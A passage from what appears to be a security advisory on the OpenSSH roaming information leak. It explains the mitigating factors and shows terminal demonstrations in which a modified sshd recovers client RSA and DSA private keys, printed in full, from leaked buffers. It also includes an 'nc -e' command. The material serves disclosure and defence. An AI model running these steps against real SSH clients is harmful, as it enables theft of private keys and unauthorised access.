command-line (-o \"UseRoaming no\"). \n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak:\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume]^Z\n[1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak:\n\n$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.ls\"\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.tar\"\ntar: Removing leading `/\u0027 from member names\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n... \n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\nSimilarly, the SCP client uses the SSH client\u0027s stdin and stdout to\ntransfer data, and can be forced by a malicious SSH server to output a\ncontrol record that ends in \u0027\\n\u0027 (an error message in server-to-client\nmode, or file permissions in client-to-server mode); this \u0027\\n\u0027 is then\nread from stdin by the fgetc() call in wait_for_roaming_reconnect(), and\ntriggers an automatic reconnection that allows the information leak to\nbe exploited without user interaction:\n\n# env ROAMING=\"scp_mode sleep:1\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp\n$ [connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\nlost connection\n\n3. Although a man-in-the-middle attacker can reset the TCP connection\nbetween an OpenSSH client and an OpenSSH server (which does not support\nroaming), it cannot exploit the information leak without breaking server\nhost authentication or integrity protection, because it needs to:\n\n- first, append the \"resume@appgate.com\" algorithm name to the server\u0027s\n initial key exchange message;\n\n- second, in response to the client\u0027s \"roaming@appgate.com\" request,\n change the server\u0027s reply from failure to success. \n\nIn conclusion, an attacker who wishes to exploit this information leak\nmust convince its target OpenSSH client to connect to a malicious server\n(an unlikely scenario), or compromise a trusted server (a more likely\nscenario, for a determined attacker). \n\n4. In the client, wait_for_roaming_reconnect()\ncalls ssh_connect(), the same function that successfully established the\nfirst connection to the server; this function supports four different\nconnection methods, but each method contains a bug and may fail to\nestablish a second connection to the server:\n\n- In OpenSSH \u003e= 6.5 (released on January 30, 2014), the default\n ssh_connect_direct() method (a simple TCP connection) is called by\n wait_for_roaming_reconnect() with a NULL aitop argument, which makes\n it impossible for the client to reconnect to the server:\n\n 418 static int\n 419 ssh_connect_direct(const char *host, struct addrinfo *aitop,\n ... \n 424 int sock = -1, attempt;\n 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV];\n ... \n 430 for (attempt = 0; attempt \u003c connection_attempts; attempt++) {\n ... \n 440 for (ai = aitop; ai; ai = ai-\u003eai_next) {\n ... \n 470 }\n 471 if (sock != -1)\n 472 break; /* Successful connection. */\n 473 }\n 474\n 475 /* Return failure if we didn\u0027t get a successful connection. */\n 476 if (sock == -1) {\n 477 error(\"ssh: connect to host %s port %s: %s\",\n 478 host, strport, strerror(errno));\n 479 return (-1);\n 480 }\n\n Incidentally, this error() call displays stack memory from the\n uninitialized strport[] array, a byproduct of the NULL aitop:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n\n- The special ProxyCommand \"-\" communicates with the server through the\n client\u0027s stdin and stdout, but these file descriptors are close()d by\n packet_backup_state() at the beginning of wait_for_roaming_reconnect()\n and are never reopened again, making it impossible for the client to\n reconnect to the server. Moreover, the fgetc() that waits for \u0027\\n\u0027 or\n \u0027\\r\u0027 on the closed stdin returns EOF and forces the client to exit():\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/nc -e \"/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1\" 127.0.0.1 222\nPseudo-terminal will not be allocated because stdin is not a terminal. \nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that\n passes a connected file descriptor back to the client, but it calls\n fatal() while reconnecting to the server, because waitpid() returns\n ECHILD; indeed, the SIGCHLD handler (installed by SSH\u0027s main() after\n the first successful connection to the server) calls waitpid() before\n ssh_proxy_fdpass_connect() does:\n\n1782 static void\n1783 main_sigchld_handler(int sig)\n1784 {\n.... \n1789 while ((pid = waitpid(-1, \u0026status, WNOHANG)) \u003e 0 ||\n1790 (pid \u003c 0 \u0026\u0026 errno == EINTR))\n1791 ;\n1792\n1793 signal(sig, main_sigchld_handler);\n.... \n1795 }\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 121 /* Fork and execute the proxy command. */\n 122 if ((pid = fork()) == 0) {\n ... \n 157 }\n 158 /* Parent. */\n ... \n 167 while (waitpid(pid, NULL, 0) == -1)\n 168 if (errno != EINTR)\n 169 fatal(\"Couldn\u0027t wait for child: %s\", strerror(errno));\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015\n\n$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand=\"/usr/bin/nc -F %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Couldn\u0027t wait for child: No child processes\n\n- The method ssh_proxy_connect() fork()s a standard ProxyCommand that\n connects the client to the server, but if a disconnection occurs, and\n the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is\n waiting for a \u0027\\n\u0027 or \u0027\\r\u0027 on stdin, EOF is returned (the underlying\n read() returns EINTR) and the client exit()s before it can reconnect\n to the server:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh -o ProxyCommand=\"/bin/nc %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n This behavior is intriguing, because (at least on Linux and BSD) the\n signal() call that installed the main_sigchld_handler() is supposed to\n be equivalent to a sigaction() call with SA_RESTART. However, portable\n versions of OpenSSH override signal() with mysignal(), a function that\n calls sigaction() without SA_RESTART. \n\n This last mitigating factor is actually a race-condition bug that\n depends on the ProxyCommand itself: for example, the client never\n fails to reconnect to the server when using Socat as a ProxyCommand,\n but fails occasionally when using Netcat. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\nvOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi\n/rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE\nK+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr\n+7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n\nUxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7\nqsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11\n1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV\npmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:1280\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-97ed9f59/infoleak\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:768\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-9448bb7f/infoleak\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\n... \n\n# env ROAMING=\"client_out_buf_size:1024\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-279f5e2b/infoleak\n... \niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n... \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:2048\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-35ee7ab0/infoleak\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-6cb31d82/infoleak\n... \nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n$ /usr/bin/ssh -V\nOpenSSH_7.0, LibreSSL 2.2.2\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL\nruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s\n17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8\nL/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh\nxSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP\nvavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl\nJka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP\nKyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19\nqJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY\ngQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK\nQolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt\ngKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL\ncQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB\n+s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl\nhcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri\nhBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh\nvhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O\nnFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG\n8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n-----END RSA PRIVATE KEY-----\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 1 %h %p\" -p 222 127.0.0.1\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n(this example requires a ProxyCommand because of the NULL-aitop bug\ndescribed in the Mitigating Factors of the Information Leak section, and\ncrashes because of the NULL-pointer dereference discussed in the\nMitigating Factors of the Buffer 